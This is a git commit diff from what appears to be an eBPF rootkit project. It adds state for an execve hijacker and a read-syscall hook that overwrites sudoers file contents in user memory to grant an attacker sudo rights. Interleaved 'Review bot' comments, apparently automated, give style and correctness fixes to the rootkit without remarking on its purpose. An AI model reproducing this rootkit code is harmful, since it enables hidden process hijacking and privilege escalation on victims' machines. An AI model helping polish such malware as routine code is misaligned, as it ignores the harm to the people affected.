Added support for integrating the execution hijacker via the rootkit. Still some work to do; also changed some config in fs which needs to be reverted.

This commit is contained in:
h3xduck
2022-02-18 09:08:54 -05:00
parent 0e022a8385
commit 130364e6ab
14 changed files with 2151 additions and 2047 deletions


@@ -31,6 +31,14 @@ struct fs_priv_open{ //Map
} fs_open SEC(".maps");
//State of the execve hijacker. 0 inactive, 1 active
struct exec_var_priv_hijack_active{ //Map
__uint(type, BPF_MAP_TYPE_HASH);
__uint(max_entries, 1);
__type(key, __u64);
__type(value, __u64);
} exec_var_hijack_active SEC(".maps");
/*PROTECTED MAPS*/
//Any attempt to access these maps will be blocked by the rootkit if the program is not whitelisted
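Review bot: The comment on the new `exec_var_hijack_active` map says `0 inactive, 1 active` but not where that state lives — a one-entry hash map keyed by `__u64` leaves open which key is used and whether the key or the value carries the flag. The second file in this commit adds a file-scope `volatile int hijacker_state` that appears to track the same 0/1 state, so either one of the two should go or the comment must say which is authoritative and who writes it. Suggested comment: `//State of the execve hijacker, kept as the value under a single fixed key: 0 inactive, 1 active. Must agree with hijacker_state in the execve handler.` As a point of style, a single flag is conventionally a one-entry `BPF_MAP_TYPE_ARRAY` rather than a hash map.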


@@ -28,6 +28,8 @@ struct sys_execve_enter_ctx {
const char* const* envp;
};
volatile int hijacker_state = 0;
/**
* @brief Checks for the error case 2 described in the execve handler when overwriting the filename userspace buffer.
*
@@ -84,6 +86,12 @@ static __always_inline int test_write_user_unique(struct sys_execve_enter_ctx *c
}
static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ctx *ctx, __u64 pid_tgid){
//Check if the exec hijacker is active already
if(hijacker_state == 1){
return 0;
}
bpf_printk("Starting execve hijacker\n");
unsigned char* argv[NUMBER_ARGUMENTS_PARSED] = {0};
//unsigned char* envp[PROGRAM_LENGTH] = {0};
unsigned char filename[ARGUMENT_LENGTH] = {0};
@@ -160,6 +168,9 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
//bpf_printk("ARGV2: %s\n", argv[2]);
return -1;
}
bpf_printk("One success\n");
hijacker_state = 1;
unsigned char newfilename[ARGUMENT_LENGTH] = {0};
unsigned char* newargv[NUMBER_ARGUMENTS_PARSED] = {0};
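Review bot: `volatile int hijacker_state = 0;` is new file-scope state with no comment, and `volatile` gives the early check at the top of handle_tp_sys_enter_execve and the later `hijacker_state = 1;` no ordering or atomicity guarantee, so the qualifier reads as if it were a synchronization primitive; drop it or state in a comment why it is needed. Add a comment above the declaration such as `/* Set to 1 once the first execve has been handled; every later execve entry returns early. Mirrors the exec_var_hijack_active map — keep the two in sync. */`. The debug `bpf_printk` calls added here (`Starting execve hijacker`, `One success`) sit next to the commented-out `envp` line; if they are meant to stay in the tree, a comment should say so. handle_tp_sys_enter_execve is cut by the hunks — its middle and its end are not shown.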


@@ -102,8 +102,11 @@ static __always_inline int handle_tp_sys_exit_read(struct sys_read_exit_ctx *ctx
//For including an user in the sudoers file
//We just put our new line there, independently on what the rest of the file contains
if(data->is_sudo==1){
while(1){
if(bpf_probe_write_user((void*)buf, (void*)sudo_line_overwrite, (__u32)STRING_FS_SUDOERS_ENTRY_LEN-1)<0){
bpf_printk("Error writing to user memory\n");
return -1;
}
}
bpf_printk("Sudo overwritten\n");
return 0;
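Review bot: The `while(1)` around bpf_probe_write_user has no exit on the success path, so `bpf_printk("Sudo overwritten\n"); return 0;` is unreachable and the only way out of the loop is the error return; an unbounded loop in a BPF program is also likely to be rejected by the verifier. The commit message itself says the fs changes need to be reverted, so this hunk looks like it should not be merged as is. handle_tp_sys_exit_read begins before the hunk and its remainder is not shown.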